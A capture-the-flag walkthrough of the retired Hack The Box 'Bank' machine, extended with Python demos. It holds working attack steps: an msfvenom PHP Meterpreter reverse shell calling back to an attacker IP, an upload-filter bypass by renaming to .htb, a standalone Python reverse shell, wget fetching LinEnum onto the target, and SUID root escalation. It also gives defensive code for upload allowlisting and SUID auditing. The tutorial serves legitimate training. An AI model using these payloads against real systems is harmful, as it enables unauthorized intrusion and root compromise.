Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Bank is a relatively simple machine; however, proper web enumeration is key to finding the data needed for entry.
We will use the following tools to pwn the box from a Kali Linux box:
- nmap
- gobuster
- searchsploit
- msfconsole
- Metasploit
- msfvenom
- Meterpreter
- LinEnum
Let's get started.
Step 1 - Reconnaissance
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.
Port scanning
I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many options you can use with this tool to scan a network. If you want to learn more, have a look at the documentation here.
I use the following command to perform an intensive scan:
nmap -A -v bank.htb
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
bank.htb: hostname for the Bank box
If you find the results a bit overwhelming, you can run a plain scan to get only the open ports. Without -p this uses Nmap's default list of the 1000 most common ports, so it can miss services on unusual ports:
nmap bank.htb
We can see that there are 3 open ports:
Port 22, Secure Shell (SSH): secure logins, file transfers (scp, sftp) and port forwarding
Port 53, Domain Name System (DNS)
Port 80, most often used by Hypertext Transfer Protocol (HTTP)
Directory scanning
I use Gobuster. Gobuster is a directory brute-forcing tool written in Go. More info on the tool here. On Kali the wordlists are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here.
I use this command with the dirb common.txt wordlist:
gobuster dir -u bank.htb -w /usr/share/wordlists/dirb/common.txt
I can see some interesting folders. I do another directory scan with a different wordlist.
gobuster dir -u bank.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Step 2 - Visiting the web page
From the reconnaissance phase, I decide to start with port 80. Browsing to the IP address only shows the Apache2 Ubuntu default page: the bank site is a name-based virtual host, so Apache serves it only when the request carries the right Host header. We therefore need to resolve that name locally, following the standard convention for HTB machines, bank.htb.
I add bank.htb to the /etc/hosts file
nano /etc/hosts
with
10.10.10.29 bank.htb
I check the file with
cat /etc/hosts
When I navigate to bank.htb, I now see a login page.
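As an added example (not part of the original write-up), here is what the difference between the Apache default page and the bank login page comes down to: name-based virtual hosting. The tiny server below stands in for the box with two constructed pages, chosen by the Host header alone; the real pages of the bank site are not reproduced. The same check can be done against the box with curl before touching /etc/hosts, for example curl -H 'Host: bank.htb' http://10.10.10.29/.

```python
"""Name-based virtual hosting in miniature: same IP, same port, same URL,
different page depending only on the Host header. Added example; the two
response bodies are constructed stand-ins for what the box returned."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-ins for the two responses seen on the box.
VHOSTS = {
    "bank.htb": b"<title>HTB Bank - Login</title>",
}
DEFAULT_PAGE = b"<title>Apache2 Ubuntu Default Page: It works</title>"


class VHostHandler(BaseHTTPRequestHandler):
    """Pick the site from the Host header, falling back to the default
    vhost exactly as Apache does for a name it has no VirtualHost for."""

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = VHOSTS.get(host, DEFAULT_PAGE)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind to a free localhost port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(ip, port, host_header):
    """GET / from ip:port while presenting `host_header` as the Host header.
    This is what the /etc/hosts entry achieves for the browser: the TCP
    connection still goes to the IP, only the Host header changes."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return body


def demo():
    """Return (body seen by IP, body seen with Host: bank.htb)."""
    srv = start_server()
    ip, port = srv.server_address
    try:
        by_ip = fetch(ip, port, f"{ip}:{port}")
        by_name = fetch(ip, port, "bank.htb")
    finally:
        srv.shutdown()
        srv.server_close()
    return by_ip, by_name


if __name__ == "__main__":
    by_ip, by_name = demo()
    print("by IP:  ", by_ip.decode())
    print("by name:", by_name.decode())
```

The practical lesson for enumeration: when a scan shows port 80 but the browser only shows a default page, try the hostnames you know (from the HTB convention, certificates, DNS, or redirects) as Host headers before concluding the web server is empty.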
From the gobuster results, I found some directories. I navigate to /balance-transfer
I have a look at a couple of files. Every file seems to hold a full name, an email and a password, all encrypted.
I go back to the directory listing and click on the Size column to sort the transfers. One file has a different size from all the others.
When I open that file, I see an error message at the top: encryption failed for this record, and all its details are in plain text.
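The "sort by Size" trick is worth scripting, because a listing with hundreds of files is not always this kind. The following is an added example, not part of the original write-up: it models records of the shape described above (a status banner followed by name, email and password fields), flags the entry whose size deviates from the crowd, and separately flags entries whose fields do not look like hex digests. The record format, file names and values are constructed approximations, not the files from the box.

```python
"""Find the odd record in a directory of 'encrypted' account files.

Added example. Two independent detectors: a size outlier (what clicking
the Size column shows by eye) and a content check (fields that are not
32-hex-character digests). Sample data is constructed.
"""
import hashlib
import re
from collections import Counter

HEX32 = re.compile(r"^[0-9a-f]{32}$")
ODD_NAME = "f4c3f94e68d5eb0a0eae9eab77e5aaa1.acc"   # hypothetical file name


def make_record(encrypted_ok: bool, full_name: str, email: str, password: str) -> str:
    """One constructed record: a status banner followed by three fields."""
    banner = "++OK ENCRYPT SUCCESS" if encrypted_ok else "--ERR ENCRYPT FAILED"
    return (f"{banner}\n"
            f"Full Name: {full_name}\n"
            f"Email: {email}\n"
            f"Password: {password}\n")


def parse_fields(text: str) -> dict:
    """Turn 'Key: value' lines into a dict; banner lines have no ': '."""
    fields = {}
    for line in text.splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            fields[key.strip()] = value.strip()
    return fields


def size_outliers(records: dict, tolerance: int = 0) -> list:
    """Names whose byte size deviates from the most common size by more
    than `tolerance` bytes. Records produced by the same template share a
    size, so the one that does not is the one to read first."""
    sizes = {name: len(text.encode()) for name, text in records.items()}
    modal_size, _ = Counter(sizes.values()).most_common(1)[0]
    return sorted(n for n, s in sizes.items() if abs(s - modal_size) > tolerance)


def plaintext_records(records: dict) -> list:
    """Names whose Email or Password field is not a 32-hex-char digest,
    i.e. records where the encryption step visibly did not happen."""
    hits = []
    for name, text in records.items():
        fields = parse_fields(text)
        values = (fields.get("Email", ""), fields.get("Password", ""))
        if any(not HEX32.match(v) for v in values):
            hits.append(name)
    return sorted(hits)


def build_sample() -> dict:
    """Constructed directory: four well-formed records and one failure.
    Names and digests are derived with md5 purely to look the part."""
    records = {}
    for i in range(4):
        def digest(label, n=i):
            return hashlib.md5(f"{label}{n}".encode()).hexdigest()
        records[f"{digest('file')}.acc"] = make_record(
            True, digest("name"), digest("mail"), digest("pass"))
    records[ODD_NAME] = make_record(False, "Jane Doe", "jane@bank.htb", "Winter2017!")
    return records


if __name__ == "__main__":
    sample = build_sample()
    for name in size_outliers(sample):
        print("size outlier:", name)
        print(sample[name])
```

Against a live listing you would feed the dict from the files you downloaded (for example with wget -r on the directory); the two detectors agree on the sample, which is the usual sign that the anomaly is real rather than a formatting quirk.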
I go back to the login panel and enter the credentials. I now have access to the dashboard of the HTB Bank. Nothing interesting on this page, so I move to the Support page.
On the Support page, I can upload files. I will try to upload a payload.
Step 3 - Using MSFvenom to craft an exploit
We will use MSFvenom, which is a payload generator. You can learn more about it here.
But first, let's look in the Metasploit Framework for a payload we could use to craft our exploit.
We know that we need a reverse shell, a type of shell in which the target machine connects back to the attacking machine. The attacking machine runs a listener on a port; once code or command execution is achieved on the target, the payload connects out to that port and the attacker gets an interactive shell over that connection. Connecting out rather than in is what lets this work through firewalls that block inbound connections to the target.
The reverse TCP shell should be a PHP one, since the web server runs PHP, and we will use Meterpreter.
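To make the connect-back pattern concrete, here is an added example that is neither the msfvenom payload used in this write-up nor Meterpreter: a minimal reverse shell pair in Python. The listener plays the role that exploit/multi/handler plays on the attacking box, the connect-back function plays the role of the uploaded payload, and both ends run on localhost. The length-prefixed framing is my own choice for the demo; a real stager speaks its own protocol.

```python
"""Reverse shell mechanics: the target connects out, the listener sends
commands and reads results. Added example; framing is a 4-byte length
prefix so each reply is read exactly, which a raw nc-style shell lacks."""
import socket
import struct
import subprocess
import threading


def _recv_exact(sock, n):
    """Read exactly n bytes or raise if the peer goes away."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def _send_frame(sock, data: bytes):
    sock.sendall(struct.pack("!I", len(data)) + data)


def _recv_frame(sock) -> bytes:
    (length,) = struct.unpack("!I", _recv_exact(sock, 4))
    return _recv_exact(sock, length)


def connect_back(host, port, max_cmds=100):
    """Target side (the payload's job): connect to the attacker's listener,
    then loop: receive a command, run it with the shell, send back the
    combined stdout/stderr. The frame b'exit' ends the session."""
    with socket.create_connection((host, port), timeout=10) as s:
        for _ in range(max_cmds):
            cmd = _recv_frame(s)
            if cmd == b"exit":
                return
            result = subprocess.run(cmd.decode(), shell=True,
                                    capture_output=True, timeout=10)
            _send_frame(s, result.stdout + result.stderr)


def run_session(commands, host="127.0.0.1"):
    """Attacker side (the handler's job), with a thread standing in for the
    compromised target. Returns one bytes object per command."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))          # port 0: let the OS pick, like choosing LPORT
    srv.listen(1)
    port = srv.getsockname()[1]
    target = threading.Thread(target=connect_back, args=(host, port), daemon=True)
    target.start()               # in real life: the victim requests shell.htb
    srv.settimeout(10)
    conn, _peer = srv.accept()   # "Meterpreter session 1 opened" moment
    outputs = []
    with conn:
        conn.settimeout(10)
        for cmd in commands:
            _send_frame(conn, cmd.encode())
            outputs.append(_recv_frame(conn))
        _send_frame(conn, b"exit")
    target.join(timeout=10)
    srv.close()
    return outputs


if __name__ == "__main__":
    for out in run_session(["id", "uname -a"]):
        print(out.decode(errors="replace"), end="")
```

Everything here travels in clear text, which is one reason to prefer Meterpreter or an SSH-based channel on a real engagement: anyone watching the wire between the two hosts sees every command and result.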
From the Offensive Security website, we get this definition for Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here
I launch Metasploit and search for reverse TCP payloads with the following command:
search php meterpreter reverse_tcp
I find an interesting payload, number 594 in the search results, a reverse TCP stager for PHP: it connects back to the attacker and stages the Meterpreter server over that connection. (The Reflective DLL Injection wording in the search output belongs to the Windows stagers; the PHP stager is pure PHP, which is what a Linux web server can run.)
payload/php/meterpreter/reverse_tcp
Now let's go back to msfvenom to craft our exploit. I use the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.36 lport=4444 -f raw > HTBbankshell.php
LHOST is the Kali box's address on the HTB VPN and LPORT must be the same port the handler listens on in Step 4, otherwise the payload connects to a port nobody is listening on. I then check with ls that the file has been created
and I cat the file to see the payload:
cat HTBbankshell.php
I go back to the support page. I add a title and a message and attach the file to the form.
I click on the submit button and see an error message: the file type is rejected.
I check the page source and see a comment saying that, for debugging purposes, files with the .htb extension are executed as PHP. The upload filter blocks .php by name, but the server still runs anything ending in .htb, which is exactly the gap we need.
I rename my payload from HTBbankshell.php to HTBbankshell.htb
My file is now ready to be uploaded on the support page.
And it seems to work! The payload has been uploaded through the support page.
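The bypass works because the upload check and the web server disagree about what a "PHP file" is. As an added example in Python (not the bank application's own PHP), the following puts the weak check next to a hardened one. The rules are assumed, not taken from the box: an extension denylist, as the original filter evidently used, beside an allowlist that also refuses double extensions; the set of extensions the server executes is a stand-in, with .htb added as the debugging alias the page's HTML comment revealed.

```python
"""Upload extension checks: denylist (bypassed by .htb) versus allowlist.

Added example. EXECUTED_AS_PHP is an assumption standing in for the box's
Apache configuration, which the write-up does not show; the other rules
are hypothetical too.
"""
import os
import secrets

# Extensions the web server hands to the PHP engine. ".htb" is the debug
# alias from the page's HTML comment (assumed to be mapped with an
# AddType/AddHandler style directive).
EXECUTED_AS_PHP = {".php", ".phtml", ".php5", ".phar", ".htb"}

DENYLIST = {".php"}                                     # hypothetical original check
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def extensions(filename: str) -> list:
    """All dot-suffixes of a name, lowercased: 'a.php.jpg' -> ['.php', '.jpg'].
    Apache's mod_mime looks at every suffix, not only the last one."""
    parts = os.path.basename(filename).lower().split(".")
    return ["." + p for p in parts[1:]]


def would_execute(filename: str) -> bool:
    """True if any suffix is one the server runs as PHP."""
    return any(ext in EXECUTED_AS_PHP for ext in extensions(filename))


def denylist_accepts(filename: str) -> bool:
    """The weak check: only the last extension, only against a short list.
    'HTBbankshell.htb' sails through, and so would 'shell.phtml'."""
    exts = extensions(filename)
    return not exts or exts[-1] not in DENYLIST


def allowlist_accepts(filename: str) -> bool:
    """The hardened check: exactly one extension and it must be allowed.
    Double extensions such as 'shell.php.jpg' are rejected because an
    AddHandler-style mapping would still execute them."""
    exts = extensions(filename)
    return len(exts) == 1 and exts[0] in ALLOWLIST


def storage_name(filename: str) -> str:
    """Name to store an accepted upload under: a random token plus the
    allowlisted extension, so the uploader controls neither the name nor
    the path. Raises on anything the allowlist refuses."""
    if not allowlist_accepts(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return secrets.token_hex(16) + extensions(filename)[0]


if __name__ == "__main__":
    for name in ("HTBbankshell.php", "HTBbankshell.htb", "shell.php.jpg", "report.pdf"):
        print(f"{name:18} denylist={denylist_accepts(name)!s:5} "
              f"allowlist={allowlist_accepts(name)!s:5} executes={would_execute(name)}")
```

The name check is only half of the fix: the uploads directory should also be served with script execution disabled (for mod_php, php_admin_flag engine off in that directory, or better, storing uploads outside the web root and serving them through a download handler), so that a mistake in the filter does not turn into code execution.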
Step 4 - Setting up a listener with Metasploit
Back in Metasploit, I use the following command to select the generic payload handler:
use exploit/multi/handler
I first set the payload, which must match the one the file was generated with:
set payload php/meterpreter/reverse_tcp
Then the LHOST:
set lhost 10.10.14.36
And finally the LPORT, the same port the payload was generated with:
set lport 4444
If we check the options now with show options, we should see that everything is set up.
Let's run the exploit.
After this message appears
Started reverse TCP handler on 10.10.14.36:4444
go back to the browser and request the uploaded file, so that the server executes it and the payload connects back:
bank.htb/uploads/HTBbankshell.htb
You should then see a Meterpreter session opened.
I start by gathering some information with getuid, which shows the user account the Meterpreter server is running as on the target, and sysinfo.
Step 5 - Looking for the user.txt flag
I start at the root of the filesystem (/) and list the folders and files.
I move to the home directory with
cd home
and I can see a user called chris.
I move to the chris directory and when I list the files...
I find the user.txt file! To read the content of the file I use the command
cat user.txt
Now that we have the user flag, let's find the root flag!
Step 6 - Performing Privilege Escalation
I try to navigate to /root and access is denied.
I will use LinEnum to enumerate more information from this machine. LinEnum is a script for local Linux enumeration and privilege escalation checks. More info here.
I fetch LinEnum from GitHub onto my Kali box with
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
I check with this command that the script has been fetched:
ls -la
I make the script executable with
chmod +x LinEnum.sh
Execute permission is all that is needed; the often-seen chmod 777 also makes the file world-writable, which nothing here requires. The mode is not carried over by wget anyway, so on the target the script is started through its interpreter explicitly.
Within meterpreter I check that the file is present on my local (attacking) machine with lls, the local counterpart of ls:
lls -S "LinEnum.sh"
I start PHP's built-in web server in another terminal to serve the script. It must listen on a port other than the handler's 4444, which Metasploit already holds, so I use 8000:
php -S 10.10.14.36:8000
I type the following command to get a standard shell on the target system
shell
I spawn a TTY shell with
python3 -c 'import pty;pty.spawn("/bin/bash")'
(if python3 is not present on the target, try python instead). And I transfer the file to the machine with
wget http://10.10.14.36:8000/LinEnum.sh -O /tmp/LinEnum.sh
which copies the file from my Kali box into the target's /tmp folder, one of the few directories the web server account can normally write to.
I then change to /tmp on the target to check that the file has arrived.
I then run the script with
bash ./LinEnum.sh
LinEnum is a bash script, so I run it with bash rather than sh: on Ubuntu sh is dash, which does not handle the script's echo -e output the same way.
The scan gives me a lot of information. I look for the interesting-files section and, in it, the SUID files. A SUID binary runs with the privileges of its owner instead of those of the user who executes it, so a root-owned SUID program that can be made to spawn a shell hands out a root shell.
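The SUID section of LinEnum's output is the scripted form of find / -perm -4000 -type f. As an added example, not LinEnum's own code, the following walks a filesystem for setuid and setgid files and separates the ones that are not on a baseline of stock binaries, which is how a binary under a path like /var/htb/bin stands out from /usr/bin/passwd and friends. The baseline is a hypothetical sample; on a real engagement compare against a clean install of the same distribution release.

```python
"""Enumerate SUID/SGID binaries and flag the ones outside a baseline.

Added example. KNOWN_SUID is a hypothetical baseline, not a complete list
for any release; the demo tree is constructed in a temporary directory.
"""
import os
import shutil
import stat
import tempfile

KNOWN_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/usr/bin/gpasswd",
}
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def find_setuid(roots, skip_prefixes=SKIP_PREFIXES):
    """(path, owner uid, permission bits) for every regular file under the
    given roots that has the SUID or SGID bit set."""
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
            if dirpath.startswith(skip_prefixes):
                dirnames[:] = []          # do not descend into pseudo-filesystems
                continue
            for fn in filenames:
                path = os.path.join(dirpath, fn)
                try:
                    st = os.lstat(path)   # lstat: never follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def unexpected(hits, baseline=KNOWN_SUID):
    """Hits not in the baseline, root-owned ones first: those are the
    candidates for a direct root shell."""
    extra = [h for h in hits if h[0] not in baseline]
    return sorted(extra, key=lambda h: (h[1] != 0, h[0]))


def build_demo_tree(base):
    """Constructed tree mirroring the box's layout: one SUID script and
    one ordinary file under <base>/var/htb/bin."""
    bindir = os.path.join(base, "var", "htb", "bin")
    os.makedirs(bindir)
    suid_path = os.path.join(bindir, "emergency")
    plain_path = os.path.join(bindir, "notes.txt")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho demo\n")
    os.chmod(suid_path, 0o4755)    # rwsr-xr-x
    os.chmod(plain_path, 0o644)
    return suid_path


def demo_finds_planted() -> bool:
    """Build the tree in a temp dir, scan it, and report whether the
    planted SUID file (and nothing else) came back as unexpected."""
    base = tempfile.mkdtemp()
    try:
        planted = build_demo_tree(base)
        found = [p for p, _uid, _mode in unexpected(find_setuid([base], skip_prefixes=()))]
        return found == [planted]
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for path, uid, mode in unexpected(find_setuid(["/"])):
        print(f"{mode:04o} uid={uid} {path}")
```

Run as the low-privileged shell user it lists exactly what that user could execute; a root-owned entry outside the baseline is then worth running, reading with strings, or checking on GTFOBins before anything more elaborate.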
I spot an interesting file:
/var/htb/bin/emergency
I navigate to /var/htb/bin
I run it with
./emergency
and I'm asked if I want to get a root shell :)
I have root access to the machine
I can now navigate to /root
I find the root.txt file!
To read the content of the file I use the command
cat root.txt
Congrats! You found both flags!
Please don’t hesitate to comment, ask questions or share with your friends :)
You can see more of my articles here
You can follow me on Twitter or on LinkedIn
And don't forget to #GetSecure, #BeSecure & #StaySecure!
Other Hack The Box articles
Keep Calm and Hack The Box - Lame
Keep Calm and Hack The Box - Legacy
Keep Calm and Hack The Box - Devel
Keep Calm and Hack The Box - Beep
Keep Calm and Hack The Box - Optimum
Keep Calm and Hack The Box - Arctic
Keep Calm and Hack The Box - Grandpa
Keep Calm and Hack The Box - Granny
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-bank/